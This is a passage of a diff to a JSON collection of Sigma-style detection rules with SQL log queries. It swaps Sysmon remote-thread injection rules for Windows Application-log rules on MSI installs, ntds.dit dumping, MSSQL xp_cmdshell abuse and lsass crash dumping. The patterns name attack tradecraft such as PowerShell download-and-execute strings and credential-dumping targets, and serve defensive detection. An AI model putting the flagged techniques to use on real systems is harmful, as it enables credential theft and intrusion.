of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.t1219" ], "falsepositives": [ - "There are no known false positives at this time" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "sysmon_process_hollowing.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "title": "MSI Installation From Suspicious Locations", + "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", + "description": "Detects MSI package installation from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative action" + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_msi_install_from_susp_locations.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "title": "MSI Installation From Web", + "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "status": "experimental", + "description": "Detects installation of a remote msi file from web.", + "author": "Stamatis Chatzimangou", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1218", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_msi_install_from_web.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "status": "experimental", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Dump Ntds.dit To Suspicious Location", + "id": "94dc4390-6b7c-4784-8ffc-335334404650", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_esent_ntdsutil_abuse_susp_location.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "title": "Ntdsutil Abuse", + "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_esent_ntdsutil_abuse.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Suspicious Remote Thread Target", - "id": "f016c716-754a-467f-a39e-63c06f773987", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_target.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "status": "experimental", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Antivirus products" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", - "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "test", + "description": "Detects backup catalog deletions", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1055" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_susp_backup_delete.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "status": "experimental", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Unknown" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "WMI Event Subscription", - "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "status": "test", - "description": "Detects creation of WMI event subscription persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "status": "experimental", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.persistence" ], "falsepositives": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Legitimate use of the feature by administrators (rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID IN ('19', '20', '21')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_event_subscription.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", - "id": "db809f10-56ce-4420-8c86-d6a7d793c79c", - "status": "test", - "description": "Detects raw disk access using uncommon tools, which could indicate possible defense evasion attempts", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1006" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE NOT ((Device LIKE '%floppy%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 